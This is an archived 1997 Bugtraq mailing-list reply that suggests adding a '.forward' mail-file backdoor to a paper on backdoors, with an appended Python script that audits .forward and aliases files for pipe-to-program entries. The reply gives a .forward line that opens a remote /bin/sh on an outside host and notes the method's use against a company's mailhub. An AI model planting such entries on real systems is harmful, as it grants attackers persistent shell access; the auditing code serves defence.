[5176] in bugtraq
Re: Backdoor Paper
daemon@ATHENA.MIT.EDU (Evil Pete)
Mon Aug 25 14:10:41 1997
Date: Mon, 25 Aug 1997 10:44:34 -0700
Reply-To: shipley@DIS.ORG
From: Evil Pete <shipley@DIS.ORG>
To: BUGTRAQ@NETSPACE.ORG
>Here's a paper I wrote on backdoors. Feedback welcome.
<snip>
You may want to add:

.forward Backdoor

On Unix machines, placing commands into the .forward file was also
a common method of regaining access. For the account ``username''
a .forward file might be constructed as follows:

    \username
    |"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

Permutations of this method include alteration of the system's mail
aliases file (most commonly located at /etc/aliases). Note that
this is a simple permutation; the more advanced can run a simple
script from the forward file that can take arbitrary commands via
stdin (after minor preprocessing).

-Pete
PS: The above method is also useful for gaining access to a company's
mailhub (assuming there is a shared home directory FS on
the client and server).
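
For the defensive side of the .forward and aliases entries described in this post, an added example (not part of the original message) that lists every pipe-to-program delivery target in .forward or aliases text. The function names and the aliases sample are constructed for illustration; the .forward sample is the one quoted in the post.

```python
import re

# A pipe target in any quoting style sendmail accepts: |cmd, "|cmd", |"cmd"
PIPE_RE = re.compile(r'^\s*"?\s*\|')

# The .forward body quoted in the post above
SAMPLE_FORWARD = r'''\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
'''

# Constructed aliases text (hypothetical names and paths)
SAMPLE_ALIASES = '''# constructed sample
support: alice,
    "|/opt/tools/ticket-intake --queue in"
root: admin@example.org
'''

def split_targets(text):
    """Split a delivery list on commas and newlines, honouring double quotes."""
    targets, cur, quoted = [], [], False
    for ch in text:
        if ch == '"':
            quoted = not quoted
        if ch in ",\n" and not quoted:
            targets.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    targets.append("".join(cur).strip())
    return [t for t in targets if t]

def audit_forward(text):
    """Return the pipe-to-program targets in a .forward file body."""
    return [t for t in split_targets(text) if PIPE_RE.match(t)]

def audit_aliases(text):
    """Return (alias, target) pairs in aliases text that deliver to a program."""
    logical = []
    for line in text.splitlines():
        if line[:1] in (" ", "\t") and logical:
            logical[-1] += " " + line.strip()   # indented line continues the entry
        else:
            logical.append(line)
    hits = []
    for line in logical:
        name, sep, rhs = line.partition(":")
        if sep and not line.startswith("#"):
            hits += [(name.strip(), t) for t in audit_forward(rhs)]
    return hits
```

Legitimate pipes such as vacation or procmail will also be listed, so compare the hits against the programs you expect to see.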